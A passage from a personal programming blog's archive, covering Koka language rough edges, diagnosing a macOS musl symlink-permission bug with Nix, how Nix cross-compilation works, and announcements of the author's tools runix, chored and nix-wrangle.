  result

The problem here is that a in the function signature can’t be referenced in the function body. So ascribing a type list<a> in the body of a function is syntactic sugar for forall<a> list<a>, i.e “a list of any type you like”, which obviously won’t compile. There doesn’t seem to be any advantage in not making a reference “the one from the function signature”, so I’m hoping this can change in the future.

Local variables interfere with dot selection

When there’s a bunch of functions called location, Koka uses overloading to figure out which one you mean based on the arguments you pass. So in foo.location which desugars to location(foo), that’ll pick the single location function whose argument types match - or fail if there isn’t exactly one.

The one issue I’ve found with this is when you also use some field’s name as a variable, e.g. val location = "...". A local variable in scope will always be used rather than looking for other overloads. That’s a good rule, but in this case it makes foo.location a type error - that desugars to location(foo) but location is a string!

In these cases you still can access the field by using a qualified name (e.g. foo.file/location), but that’s a bit ugly - I typically find a different name for my variable. Working around this isn’t hard, it’s understanding the error message which is the hard part. Especially when you’re working through a bunch of other errors and the code in question has no obvious connection to your change.

I don’t think this is problematic enough to change the language, but the compiler error could definitely be improved when foo.bar doesn’t typecheck to highlight that bar refers to a local variable.

Matching up effect types can be hard

This may be simply a learning curve thing, but I stumbled a lot when trying to get my effect type declarations to compile.

Part of this is the way that effect types combine. They are unordered like a set, but they’re not deduplicated like a set is (they’re referred to as a row rather than a set in the documentation).

For example, I thought this would work:

fun withLogging(action: () -> e a): <console|e> a
  println("Starting action!")
  action()

You can read this as accepting an action function of type e a (generic effect, generic return type). The resulting function returns the same type, but with the effect of <console|e>, read as “console plus whatever e is”.

That doesn’t work, because if e already included the console effect, you’d have an effect type <console,console,...>, which would require two levels of console handlers to be available.

The correct way to write this is by requiring the action to have a console effect:

fun withLogging(action: () -> <console|e> a): <console|e> a
  println("Starting action!")
  action()

This says that action has the console effect. Which really means action may have the console effect, since the compiler will allow effect widening (a function can always be evaluated with more handlers available than it needs, it just won’t use them).

This does make sense, but can be a bit tedious since you often end up repeating the set of effects for both the action and return type, if you’re annotating types explicitly.

I also really struggled making effect types align. Here’s an example:

val pending: ref<h, list<thunk>> = ref([])

Gave me the error:

inferred effect: <alloc<$h>|$e>
expected effect: <alloc<$h1>|_e1>

Understanding why $h (the “heap” parameter of a ref) is not equal to $h1 and $e not equal to _e1 is not an easy task when none of those names are present (or even valid?) in the code I wrote.

I think the h difference is another instance of not being able to refer to generic type parameters. And I believe the $e / _e1 thing fell out of that too, in that if you have a ref<h> then its corresponding allocation effect is alloc<h>, and since there was a difference in h it affected both the type and the effect. But it’s not obvious from the error message, and I have since started using ref<global> over ref<h> because it leads to fewer type errors. I haven’t yet figured out why it’s useful that refs can be associated with different “heaps”, since I believe there’s only one in an actual program.

Compiler bugs

It says “experimental” on the tin for good reason!

So far I’ve run into a few compiler bugs when using effects in nontrivial ways, where the compiler generates code that crashes. In some cases I can get code that works by changing my effect type annotations, so I suspect I’m just running into codegen bugs (rather than typechecking bugs).

In some other cases I’ve been unable to get code which both compiles and runs, which is a shame. But given the language has such solid roots in research, I’m hopeful these are just minor bugs rather than larger flaws.

Summary

So far there’s a lot to love, and not a lot to put me off. That’s already a pretty amazing feat - I’m a fussy guy.

Koka is explicitly not ready for mainstream use, it’s still an experimental language. I’m really impressed with the language, and I get the feeling the core isn’t likely to significantly change, but I wouldn’t be surprised if the stdlib went through a few overhauls, and there’s no package manager yet.

So I don’t expect I’ll be writing real code in Koka any time soon, but it’s been a long time since I’ve been this excited about a new language. I’m definitely going to keep playing with it, and I might start posting more content that goes into details of my experiments and what I’m learning.

Nix remains my superpower

2024-01-31T00:00:00+11:00

I’ve long considered fluency in Nix to be a superpower that pays off way more than you might imagine, if you haven’t experienced it yourself.

Sure, it helps with the obvious practical things you’d expect - my system setup is declarative, reproducible, and suffers from vanishingly few chaotic state-based issues that tend to plague less reproducible systems (like brew in particular).

There are plenty of downsides too - I run into nix-specific issues that my colleagues with more normal setups don’t suffer. Interactions with tools like bundler building native extensions can be frustrating at best.

Those are the unsurprising, surface level tradeoffs when using a good-but-novel package manager. The real superpower comes through the staggering amount of things which are not just possible, but downright straightforward due to the reliable, principled way that nix works. Here’s a good example from last week:

Do niche things, encounter niche bugs

Firstly, I’ve got this rust project which I build on MacOS, but which cross-compiles to arm & x86 for both Mac & Linux. Without nix, I think I got a cross-compiling toolchain working once in my life, and that was mostly thanks to colleagues who had sorted it all out before I got there.

So cross-compilation is impossible thing number one that nix makes practical (I’ve talked about this before). But then when it breaks, nix also makes it easy to diagnose, fix and reproduce. When I updated nixpkgs in this project, cross-compilation stopped working with this error, which has nothing to do with my code:

cannot read symbolic link '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1': Permission denied

And indeed, I can see that it lacks permissions:

$ ls -l /nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib
ls: cannot read symbolic link '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1': Permission denied
total 3796
-r--r--r-- 1 root wheel    1000 Jan  1  1970 crti.o
-r--r--r-- 1 root wheel     776 Jan  1  1970 crtn.o
lrwx------ 1 root wheel       7 Jan  1  1970 ld-musl-x86_64.so.1
-r--r--r-- 1 root wheel 3016118 Jan  1  1970 libc.a
lrwxr-xr-x 1 root wheel       7 Jan  1  1970 libc.musl-x86_64.so.1 -> libc.so*
-r-xr-xr-x 1 root wheel  811384 Jan  1  1970 libc.so*
# ...

Note that ls prints an error while listing this directory, which is unusual. Looks like only root will be able to read that file, though all the other files have read access for all users.

I don’t know much about musl, and I don’t know why it would create a symlink that I can’t read. But nix gives me an amazingly useful toolkit for diagnosing and fixing these kinds of issues.

First, because there’s a 1:1 mapping between outputs and derivations (recipes), I can ask nix to tell me which derivation made this path:

$ nix-store --query --deriver '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1'
/nix/store/wv79kvgc5sdjxjqjbfi4sjhzd8s8fa47-musl-x86_64-unknown-linux-musl-1.2.3.drv

That’s the recipe for building the outputs I’m looking at, in a canonical, serialized format. I can drop into a shell with that derivation’s environment, i.e. all dependencies and environment variables set up:

$ nix-shell /nix/store/wv79kvgc5sdjxjqjbfi4sjhzd8s8fa47-musl-x86_64-unknown-linux-musl-1.2.3.drv
$ echo $src
/nix/store/agnzzn18q0xfk7n4ks884zx3vxaqdr2c-musl-1.2.3.tar.gz

Often when a derivation fails to build it’s useful to drop into its shell and try various commands to figure out a fix interactively. I can also pretty-print the derivation in JSON, using nix derivation show.

But first, I want to find where this derivation actually is in nixpkgs.

For maximum reproducibility, I check out nixpkgs at the git commit my project is pinned to, from the release-23.11 branch. Using guesses as well as some helpfully-unique strings in the derivation’s postInstall phase, I locate pkgs/os-specific/linux/musl/default.nix.

Now that I’ve oriented myself, it’s time to make a minimal reproduction. I’m not doing anything funky with musl, so it should be easy to reproduce outside my project’s rather large nix expression:

$ cat musltest.nix
with import /Users/tcuthbertson/dev/nix/nixpkgs {
  crossSystem.config = "x86_64-unknown-linux-musl";
};
musl

$ nix-build musltest.nix
/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3

OK, it printed the exact same path (and didn’t need to build anything). We’ve reproduced the problematic nix expression in 4 lines, without any noise related to the real project.

Now I’d like to see the build output. I can ask nix to check the build (i.e. build it again):

$ nix-build --check musltest.nix
# lots of build output

Here we get a hint. The build output includes the problematic filename in a list of file installations:

(I’ve replaced the long /nix/store path with $out in this output for brevity)

./tools/install.sh -D -m 644 lib/libdl.a $out/lib/libdl.a
./tools/install.sh -D -m 644 lib/musl-gcc.specs $out/lib/musl-gcc.specs
./tools/install.sh -D -l libc.so $out/lib/ld-musl-x86_64.so.1 || true
# ... many more

This tells me two things:

this file doesn’t have an explicit permission mode like the others (-m 644).
it’s using a custom ./tools/install.sh to do the installation

Sometime during this process I remembered a relevant question:

Do symlinks even have permissions?

No, they don’t:

The symbolic notation, lrwxrwxrwx, is the only set of access permissions a symbolic link can have. Additionally, these permissions are only representative as they are never used for any operation.

But… Huh?

Oh, Macs are different, symlinks can have permissions on a Mac. So now we’re firmly in niche territory, having Mac-only issues cross-building a linux-only program.

OK, time to look at this now-suspicious ./tools/install.sh. It has some chmod code, could that be the problem? Unlikely, remember the problematic file didn’t specify any permissions. Why would it, symlinks don’t have permissions. But just a few lines above the chmod, a smoking gun:

umask 077

Gotcha. It’s hard to accidentally chmod a symlink, as you need to pass in the nonstandard -h flag to operate on the link instead of the thing it points to. But umask is used to restrict default permissions for any kind of file creation. Including, presumably, symlinks on MacOS.

There are a couple of ways to fix this, the easiest is just to change this umask line so that it allows read access. So my fix is to relax the umask to 022; i.e. prevent write access for group and others, but not read or execute.
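To see why that one line matters, here’s the permission arithmetic as a small TypeScript sketch. It assumes a symlink is created with every permission bit requested (0777) and that MacOS applies the umask to it just like any other new file; applyUmask and formatMode are helper names I made up for the example.

```typescript
// Effective mode = requested mode with the umask bits cleared.
function applyUmask(requestedMode: number, umask: number): number {
  return requestedMode & ~umask & 0o777;
}

// Render the nine permission bits in ls style, e.g. 0o755 -> "rwxr-xr-x".
function formatMode(mode: number): string {
  const flags = "rwxrwxrwx";
  let out = "";
  for (let i = 0; i < 9; i++) {
    const bit = 1 << (8 - i);
    out += (mode & bit) !== 0 ? flags.charAt(i) : "-";
  }
  return out;
}

// Assumption: symlink creation requests all permission bits.
const symlinkRequest = 0o777;

console.log("l" + formatMode(applyUmask(symlinkRequest, 0o077))); // lrwx------
console.log("l" + formatMode(applyUmask(symlinkRequest, 0o022))); // lrwxr-xr-x
```

The first result matches the unreadable ld-musl-x86_64.so.1 entry in the listing above, and the second matches the healthy libc.musl-x86_64.so.1 symlink next to it.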

Testing changes

Now that I think I have a fix, can I test it?

Of course. The steps I used are:

1. Make the change

I check out the musl git repository and make changes locally (in this case, modifying the umask line in install.sh)

2. Integrate it into nix

To integrate my changes I could alter the nix expression’s src to point to a fork of the source code. But for simple changes it’s usually easier to iterate by adding a patch. So first I generated a patch based on my changes in git (git diff > musl.patch).

Then I added that to the existing list of patches in the nix expression (here). For testing out changes, I just use an (absolute) file path to reference the patch file on disk. This will only work on my system, but it allows me to make changes and have them picked up immediately, without needing to update any digest / commit IDs.

3. Test it

With that patch added, I rebuilt my musltest.nix test case, and success: the resulting symlink has read access. Looks like I’ve fixed it!

Integrating changes

Now that I’m confident the fix works, I want to integrate it into my actual project. After all, this all started with me wanting to build some software, not muck about in musl’s custom installer.

In order for the fix to be usable outside of my machine, I need to:

get the patch online. I push my changes to github and use that to serve a patch file
update the nix expression in my fork of nixpkgs to include the patch
pin my project to use my nixpkgs fork (there are plenty of ways to manage this, I like using niv)

And… that’s it!

Eliminating the Software Distribution Chasm

Of course, all of these things can be (and are) routinely done by people without nix. You don’t need superpowers to fix bugs in software.

But nix dramatically widens the amount of things I feel empowered to fix, as well as giving me confidence that I will be able to reproduce or modify anything I need to. And not just on my machine - any changes I can make locally, I can also ship to my users, no matter how deep in the stack the fix is.

Mentally I think of this as a distribution chasm. Outside of nix, there’s often this huge gap between the workflow and capabilities of what you can do on your machine, vs the very different workflow and capabilities there are for distributing software to others.

For example: say you use Ubuntu, and you find that musl is broken in some obscure way. I’m sure there are plenty of debian tools I don’t know about which allow you to get a deb package, set up a build environment, make changes to the source code, and then rebuild a modified package against those sources.

But then once you have a fix, how do you use it? Do you send it to the Ubuntu or upstream maintainers, and wait for your users to get the update via official channels? That’s a lot of waiting, possibly years depending on when your users upgrade their OS. Maybe you can set up your own deb repository (ugh!) so you can at least run your modifications in CI, but it’s a horrible thing to ask of your users. Not to mention you’re modifying the global version of e.g. musl they have installed, which is a pretty invasive thing to be doing.

So the user-friendly option would be to eject from package management and leap over the distribution chasm - you have to distribute your musl fork yourself, perhaps by committing it into your project (vendoring), or writing a script to build it from source as part of your project’s build. But wow, now your project takes on all the complexity of building musl.

And for what? The fix was embarrassingly simple. It’s just a single line of bash. (Aside: there are workarounds for this particular bug; but those wouldn’t work if it were a change to some C code).

Anecdotally, I tried building musl outside of nix, but I immediately ran into unrelated compile errors. That’s not unusual when first compiling an unfamiliar project, and it’s easy to give up at this stage. But using nix? After a few hours I’d diagnosed, fixed, tested and submitted a fix upstream. And while I wait, I’ve integrated that patch into my software, so I can keep building. It works on my machine, in CI, and for other contributors, with no need for manual setup. Feels like a superpower to me.

Indoor Skydiving

2023-01-23T00:00:00+11:00

Off-topic for this blog, but I have done a few indoor skydiving sessions over the past year at iFLY Melbourne. This is some video from my third session. It’s pure fun and I recommend it to anyone, you get the feeling of flying without the hassle and terror of jumping out of a plane :)

Nix cross-compilation: what even is it?

2022-12-19T00:00:00+11:00

I don’t blog much these days, apparently I just use it to announce roughly one new thing each year. But I do want to post more writing, so here’s a description of how I think about cross-compilation in nix.

This post doesn’t assume much nix knowledge. It’s not a how-to post describing the (complex) process of how to cross-compile software, it’s more of an exploration of how cross-compilation conceptually works, because it’s something I learnt recently and found interesting.

What is nix?

Nix is an operating system, a programming language, and a massive (80k+) set of software packages written in that language. Today, we’re focussing on nixpkgs, the set of packages.

What is cross-compilation?

Most software is not cross-compiled. Typically you build software on a computer, and run it on the same kind of computer. Easy peasy. You want a Linux binary? Compile it on a Linux computer or VM, my friend.

But cross compiling means building a native executable for a different kind of computer. The standard terminology here is that the place where you build is the Build platform, and the place where you will run it is the Host platform. There’s also a concept of a Target platform, but that’s a historical oddity and doesn’t matter for modern compilers.

In my case, I’ve been writing some rust software and building it on a Mac. But I want to run it on Linux too. I could do a bunch of stuff with docker, but that’s boring. And more seriously I also want to compile for the newer ARM-based Macs, without having to juggle multiple computers.

To cross-compile a trivial rust app, I’d need a rust compiler on my Mac, and I’d tell it to build myApp as a Linux binary, using a target triple like --target=x86_64-unknown-linux-gnu. Rust is a clever modern compiler, it can produce binaries for many supported targets out of the box.

But this doesn’t work for non-rust shared libraries. If you have a rust library which links against openssl for example, the one you have on your system is going to be the Mac one, not the Linux one. Oh dear.

Dependency injection

Nix uses a pattern not usually found in package definitions, but very common in programming: dependency injection.

Each package is not a static thing like a YAML file, but rather a function which requires some dependencies, and then produces a result - the fully concrete specification used to build some software. Here’s a stripped-down version of the GNU hello world program to demonstrate:

{ stdenv, fetchurl }:

stdenv.mkDerivation (rec {
  pname = "hello";
  version = "2.12.1";

  src = fetchurl {
    url = "mirror://gnu/hello/hello-${version}.tar.gz";
    sha256 = "sha256-jZkUKv2SV28wsM18tCqNxoCZmLxdYH2Idh9RLibH2yA=";
  };
})

This is a function which accepts two named dependencies (stdenv and fetchurl), then returns a derivation, which is the concrete type that nix knows how to build, producing files on disk.

fetchurl is a straightforward utility - it takes a URL and a checksum, and does the job of turning that into local files. If hello had any package dependencies, they would be passed in a similar way.
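If nix syntax is unfamiliar, the same shape can be sketched in TypeScript. This is only a model of the dependency-injection pattern: the Derivation, Stdenv and FetchUrl types and the toy implementations are made up, and the real stdenv and fetchurl do vastly more.

```typescript
// Hypothetical, heavily simplified stand-ins for nix concepts.
type Derivation = { name: string; src: string; system: string };
type SourceSpec = { url: string; sha256: string };
type Stdenv = {
  system: string;
  mkDerivation(attrs: { pname: string; version: string; src: string }): Derivation;
};
type FetchUrl = (spec: SourceSpec) => string;

// The package: a function of its dependencies, mirroring `{ stdenv, fetchurl }: ...`.
function helloPackage(deps: { stdenv: Stdenv; fetchurl: FetchUrl }): Derivation {
  const version = "2.12.1";
  return deps.stdenv.mkDerivation({
    pname: "hello",
    version,
    src: deps.fetchurl({
      url: `mirror://gnu/hello/hello-${version}.tar.gz`,
      sha256: "sha256-jZkUKv2SV28wsM18tCqNxoCZmLxdYH2Idh9RLibH2yA=",
    }),
  });
}

// A toy stdenv: it only assembles a record, nothing is built.
function makeStdenv(system: string): Stdenv {
  return {
    system,
    mkDerivation: (attrs) => ({
      name: `${attrs.pname}-${attrs.version}`,
      src: attrs.src,
      system,
    }),
  };
}

// A toy fetchurl that only names the source; nothing is downloaded.
const toyFetchurl: FetchUrl = (spec) => `source:${spec.url}`;

const helloDrv = helloPackage({ stdenv: makeStdenv("x86_64-darwin"), fetchurl: toyFetchurl });
console.log(helloDrv.name, helloDrv.system); // hello-2.12.1 x86_64-darwin
```

The package definition never names a concrete stdenv, so whoever calls it decides which one it gets.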

stdenv is a little more mysterious, it’s just “the standard environment”. Its mkDerivation function is ubiquitous in nixpkgs, and I don’t tend to think much about it.

That changed recently, when I started digging into cross-compilation.

The Nix package universe

Zooming out, nixpkgs defines this universe of package expressions. Like I said, there’s more than 80 thousand of them. Here’s a dramatically simplified version:

And they’re lazily evaluated, which is how you can get away with a single expression containing the entire universe. If you evaluate a single package, it will only load/evaluate the stuff it depends on, not the entire universe:

Every single package uses this same pattern to depend on stdenv, and this is where it gets interesting.

stdenv.mkDerivation is this ubiquitous function which takes some attributes and returns a derivation - the concrete thing to build. And it’s injected into each and every package:

Different stdenvs

It turns out, there isn’t just one but many different implementations of stdenv you could inject.

The fun one for today is the one which knows how to build stuff on a Mac, and produces Linux code.

If you inject this stdenv into the expression that builds a nix universe, you get a second universe where that stdenv is being used to build every single package in the universe. This is the universe of those same 80 thousand packages, except each of them is built on a Mac, producing binaries that run on Linux.
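Here’s a toy TypeScript version of that idea, with three packages instead of 80 thousand. The makeUniverse function and the ToyStdenv shape are hypothetical; getters stand in for nix’s lazy evaluation (though unlike nix, this toy recomputes a package on every access instead of caching it).

```typescript
type Drv = { name: string; builtOn: string; runsOn: string };
type ToyStdenv = { buildPlatform: string; hostPlatform: string };

// Records which package expressions actually got evaluated.
const evaluated: string[] = [];

// Builds a "universe": every package receives the same injected stdenv.
// Getters keep evaluation lazy, so untouched packages are never computed.
function makeUniverse(stdenv: ToyStdenv) {
  const mk = (name: string): Drv => {
    evaluated.push(`${name}@${stdenv.hostPlatform}`);
    return { name, builtOn: stdenv.buildPlatform, runsOn: stdenv.hostPlatform };
  };
  return {
    get hello(): Drv { return mk("hello"); },
    get openssl(): Drv { return mk("openssl"); },
    get firefox(): Drv { return mk("firefox"); },
  };
}

// Same package set, two different stdenvs, two universes.
const nativeUniverse = makeUniverse({ buildPlatform: "mac", hostPlatform: "mac" });
const crossUniverse = makeUniverse({ buildPlatform: "mac", hostPlatform: "linux" });

const crossHello = crossUniverse.hello;
const nativeHello = nativeUniverse.hello;
console.log(crossHello.runsOn, nativeHello.runsOn); // linux mac
console.log(evaluated); // openssl and firefox never appear
```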

The Nix package universe multiverse

So the final slightly mind blowing thing, is that the different universes are linked.

This build-for-linux stdenv automatically knows that for packages specified in the buildDependencies list, each should actually be taken from the normal build-for-Mac universe. Whereas a runtime dependency like openssl or libc needs to be taken from the current build-for-linux universe.

In practice there’s way more dependencies, but this is the general shape:

And notice how we actually have two versions of libc here. Rust needs a Mac libc at build time, while my app needs a Linux version at runtime.
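The linking rule itself is small enough to sketch in TypeScript. Everything here is a simplified assumption: universeFor, resolveDependencies and the myApp description are invented names, dependencies are just strings, and rustc’s own (Mac) libc isn’t modelled.

```typescript
type Platform = "mac" | "linux";
type Pkg = { name: string; runsOn: Platform };

// A universe here is just a lookup of packages for one host platform.
function universeFor(runsOn: Platform): (name: string) => Pkg {
  return (name) => ({ name, runsOn });
}

const buildUniverse = universeFor("mac");  // tools that run during the build
const hostUniverse = universeFor("linux"); // things the finished binary uses

// Hypothetical package description: names only, split by when they are needed.
const myApp = {
  name: "myApp",
  buildDependencies: ["rustc"],
  runtimeDependencies: ["openssl", "libc"],
};

// The cross stdenv's job in this sketch: pick the universe per dependency list.
function resolveDependencies(pkg: typeof myApp) {
  return {
    build: pkg.buildDependencies.map(buildUniverse),
    runtime: pkg.runtimeDependencies.map(hostUniverse),
  };
}

const resolved = resolveDependencies(myApp);
console.log(resolved.build.map((p) => `${p.name}@${p.runsOn}`).join(", "));   // rustc@mac
console.log(resolved.runtime.map((p) => `${p.name}@${p.runsOn}`).join(", ")); // openssl@linux, libc@linux
```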

How this inter-universe connection is actually implemented is pretty wild for historic reasons, but thankfully you don’t have to know too much about that to make use of it.

Is this novel?

Typical distributions like Debian have this whole multi-arch packaging system where the architecture becomes part of the package key.

That obviously works, Linux package managers are extremely competent at cross-compilation and I’m assuming it’s a perfectly reasonable system. But with nix, you can just build as many different universes as you want. By plumbing together expressions that refer to other expressions in a particular way, it produces a cross compiled binary without requiring cross-compilation support from the nix language or nix-build tool itself.

So… yeah. I learnt this recently when working on runix and I just enjoyed this strangely beautiful mix of compiler toolchain hacking and elegant functional programming concepts.

Ok so how do I actually… cross compile stuff?

Unfortunately, actually learning the ins & outs of writing and debugging nix expressions for cross-compilation can be quite tricky. My additional overlay for cross-compiling runix is not pretty, and it took a lot of trial and error to get this working. But the results are pretty amazing, because now I can build everything on a single machine, fully automated with no need to install various toolchains.

These are some resources I found helpful when learning cross-compilation in nix, hopefully they help if you want to dive deeper:

nix.dev: Cross Compilation
NixOS wiki: Cross Compiling
How to Learn Nix, Part 30: Cross-compilation - an extremely detailed newcomer’s diary to cross compilation, helping to digest some of the rather dense nix manual content
fenix: rust cross compilation linking

runix: run nix software without nix

2022-11-26T00:00:00+11:00

I think nix is fantastic. Language-agnostic, cross-platform, reproducible, cacheable software building and distribution. It’s not an easy thing to learn, but the payoff is tremendous.

But one thing about nix is that you typically need to be all-in. When building software, this makes sense - Nix’s reproducibility only works if all your dependencies are themselves available within nix. But as a colleague casually suggested one day: shouldn’t it be possible to run nix-built software without installing nix?

I told him a few reasons why it’s harder than it sounds, mainly due to the hardcoded /nix/store path which is assumed by the entire ecosystem. But my mind dwelt on it in the background, and it turned out to be much easier than I first thought.

Runix

So, I’m announcing runix, which does just that - it’s a small, unobtrusive executable which allows running nix software from any binary cache. Features:

small (<4mb compressed)
fast (~10 microsecond overhead after initial download)
no configuration required
unobtrusive (no need for root access or a /nix directory)
can use software from any nix-compatible binary cache (including cache.nixos.org and cachix)
conveniently distribute software via runscripts

Runscripts are a runix invention, they’re a tiny wrapper around a list of derivations and binary caches. In addition, they support:

self-bootstrapping (install runix itself if missing)
multiplatform (execute a different nix derivation per platform)

runix intentionally lacks all the development and authoring features of nix itself - you can’t evaluate nix expressions or build software locally, you can only run existing software which someone else has built and pushed to a binary cache. But for distributing software, it’s a much easier way for users to access nix-built software.

Introducing `chored`

2022-05-18T00:00:00+10:00

chored is a utility for handling repetitive chores and files.

There are many repositories. Lots of them have similar (tedious!) things they need to do, which aren’t particular to that repository:

building
linting
testing
generation of configuration for tools:
- CI configuration
- build settings
- all sorts of common or shared files
release management
documentation generation
pull request automation
updating dependencies

chored allows you to reuse solutions to these problems, and any others you can think of. It’s minimally intrusive and lightweight (just add one small wrapper script to your repo).

And even when tasks aren’t exactly the same, chored facilitates code reuse as easily as importing a URL, but as powerful as real libraries in a real programming language (because it is both of those things).

“Like Github actions?”

It allows much better sharing of functionality (without the vendor lock-in and awkward abstractions), but it just executes code - you can run it on your machine or within CI, ideally both! To help with this it also has builtin functionality for generating github workflow files to run chores in CI.

“Oh, like a rake task. Or an NPM task. Or [plenty more task runners]”

Kind of! I consider those heavyweight though, because they bring in a dependency manager with its own configuration and stateful lifecycle. They’re also only about tasks, while chored expects you’ll also use it to generate repetitive files.

The closest project I know of is probably projen, except projen’s focus is on extensive file generation for specific project types, while chored has less extensive project types and more focus on the task system. chored is also simpler because it relies on deno and Typescript, while projen supports multiple languages.

Lightweight, stateless dependency management:

Basically, I want to remove this:

$ yarn run mytask
# (it doesn't work)
$ yarn install
# (it still doesn't work)
$ rm -rf node_modules && yarn install
$ yarn run mytask
# (it works :facepalm:)

And this:

$ rake mytask
rbenv: version `2.6.5' is not installed

# (take a deep breath)
$ rbenv install `cat .ruby-version`
$ rbenv exec gem install bundler
$ rbenv exec bundle install
$ rbenv exec bundle exec rake mytask

(this can be written more tersely, but that often makes it more confusing, not less)

With most package managers, your system (the state of files on your machine) is typically out of sync with the desired state. You need to yarn install etc to bring them in sync, after every change.

With deno, your system can’t be inconsistent, it may just have some uncached imports.

anyone running a given module will use the exact same dependencies, regardless of the state of your machine (it’ll just be slower from an empty cache)

Lightweight abstraction:

At its heart, a chore definition (choredef) is simply a function, accepting a single arguments object. This can be whatever shape you need, and you can make fields optional or mandatory in the usual typescript way.

./chored collects your commandline arguments into an object, and passes this to your chosen chore. Here’s what a trivial greet chore looks like, it accepts no options and prints a simple message:

// choredefs/greet.ts
export default function(opts: {}) {
   console.log("Hello, world!")
}

Types!

Chored uses typescript throughout. When invoking a chore, it typechecks the arguments you provided on the commandline with the arguments accepted by that chore. If you’re missing something, or pass in the wrong type, or pass in an option that isn’t recognised, you’ll get an error. Nice.

Of course, the benefit of types extends to writing your own chores, reusing third party modules, etc.

Files!

Sometimes you want to run a thing right now. Other times, you want to generate a file to tell your CI system to run a thing at some other time. Or maybe you just want to generate some super standard boilerplate files across many repos, like compiler / linter config, LICENSE files, release scripts, etc.

You could even build a kubernetes abstraction within chored - you design the input types and then implement conversions to YAML files that you either keep on-disk or send directly into kubectl apply.

Chored has first-class support for generating files - in fact, the chored script in your repository is managed via this file rendering chore, so updating that chore will also bring in any changes to the chored script. How meta!

Background - how I got here:

Chored is not my first attempt to solve this problem. Previously, I built dhall-render and dhall-ci, which were based on an experiment I pursued in my day job. These together aimed to solve the problem of generating files, with many of the same goals.

However even though I’m quite pleased with the results, there were some downsides that come from only generating files, and not being able to execute arbitrary logic.

you end up generating a lot of scripts (usually written in bash or dependency-free ruby), which clutters a repository. To avoid the clutter I experimented with generating Makefiles, which is clearly a red flag considering how much I hate automake!
you end up pushing logic through awkwardly-shaped holes
- where in a real language you might do some logic based on $GITHUB_HEAD_REF or $GITHUB_REF to detect the branch name across both push and pull_request github events, when generating files you have to serialize that as inline bash expressions, and those are not pretty, and definitely not readable.
generating files can help with declarative systems like github actions, but there’s tremendous value in deemphasizing this kind of vendor-specific solution. chored encourages me to write code that also works outside of github actions, because it’s so much more convenient to use and test.

More recently, I also encountered projen. While I find it too cumbersome to adopt wholesale due to its support for multiple languages, I realised that I really wanted some of the benefits afforded by its implementation - notably the task system and the excellent support for Typescript in most editors.

nix-wrangle: Manage nix sources and dependencies with ease

2019-10-13T00:00:00+11:00

Update:

Doing things my own way is too much effort, I just use niv these days :)

My last post was more than a year ago, in which I described my long journey towards better package management with nix.

Well, it turns out that journey wasn’t over. Since then, I’ve been using the tools I created and found them unfortunately lacking.

So, I’ve built just one more tool, to replace those described in the previous post.

I’m writing this assuming you’ve read the previous post, otherwise I’d be repeating myself a lot. If you haven’t, just check out nix-wrangle and don’t worry about my previous attempts ;)

Step 7: nix-wrangle for development, dependency management and releases

After a lot of mulling over the interconnected problems described in that previous post (and discussions with the creators of similar tools), I came at it from a new direction. Nix wrangle is the result of that approach. I’ve been using it fairly successfully for a while now, and I’m ready to announce it to the world.

How does it differ from my previous state of using nix-update-source and nix-pin?

One JSON file for all dependencies, allowing bulk operations like show and update, as well as automating dependency injection (since all dependencies are known implicitly).
A splice command which takes a nix derivation file and injects a synthetic src attribute, baking in the current source from the nix-wrangle JSON file. This allows you to keep an idiomatic nix file for local development (using a local source), and automatically derive an expression using the latest public sources for inclusion in nixpkgs proper.
Project-local development overrides. The global heuristic of nix-pin caused issues and some confusion, so nix-wrangle supports local sources for exactly the same purpose, but with an explicit, project-level scope.

Please check it out if you use nix! And if you don’t use nix, check that out first :)

A journey towards better nix package development

2018-05-12T00:00:00+10:00

Update:

Doing things my own way is too much effort, I just use niv these days :)

This post is targeted at users of nix who write / maintain package derivations for software they contribute to. I’ve spent a lot of time doing (and thinking about) this, although it’s probably quite a niche audience ;)

tl;dr: you should check out nix-pin and nix-update-source if you want to have a happy life developing and updating nix expressions for projects you work on.

I believe nix is a technically excellent mechanism for software distribution and packaging.

But it’s also flexible enough that I want to use it for many different use cases, especially during development. Unfortunately, there are a few rough edges which make a good development setup difficult, especially when you’re trying to build expressions which serve multiple purposes. Each of these purposes has quite a few constraints:

Purpose 1: Inclusion in nixpkgs proper

This is in some ways the most restrictive part - if I didn’t need to include my packages in nixpkgs, I could make my derivations as funky and complex as I like. But there’s a lot of value to being in nixpkgs. The general constraints are that nixpkgs derivations should be idiomatic and functionality which isn’t needed for nixpkgs is frowned upon:

simple packages should be a single function which takes its dependencies in a callPackage-compatible way
splitting a simple derivation across multiple files is frowned upon (e.g. for the purposes of a common build.nix but different src.nix between nixpkgs and your upstream repository)
externalizing attributes into a machine-readable / writable format (e.g. JSON) for easy automation will get your changes reverted (sadly)

Purpose 2: Allowing easy updates

Updating a package in nix is kind of tedious. For a typical github-hosted package you’ll need to update the rev attribute to the new version, but then you also need to update the sha256, and that’s not actually trivial. There are two options:

run nix-prefetch-url on the github tarball address, or
break the existing sha256 attribute by modifying one or more characters (you can’t use an empty digest, that won’t get past the sanity checks), then:
- build your package
- copy-paste the correct sha256 from the error message into your package definition

I can never remember github’s tarball format, so both of these are pretty tedious. It may not be that much work each time, but the more packages (and versions) you commit to nixpkgs, the more this feels like a computer should be doing the tedious part for you.

Purpose 3: Standalone development (i.e. as part of the project being built)

I don’t know how common this is, but I keep nix expressions inside all of my repos. I think it’s a good idea to version your nix expressions with your code, especially when you’re working on changes to both at the same time. And since I love nix, why wouldn’t I want all of my projects to have a nix expression so I can get dependencies set up trivially and know that my build works, without accidentally depending on my system environment?

Sometimes they’re just shell.nix files used for development, but a lot of the times they’re fully buildable nix derivations.

For the packages which are in nixpkgs, I want to keep a verbatim copy in my repo, but I still want the repo copy for testing changes, and so anyone with a copy of my project also has the appropriate build expression for any given revision.

Purpose 4: Inter-project development

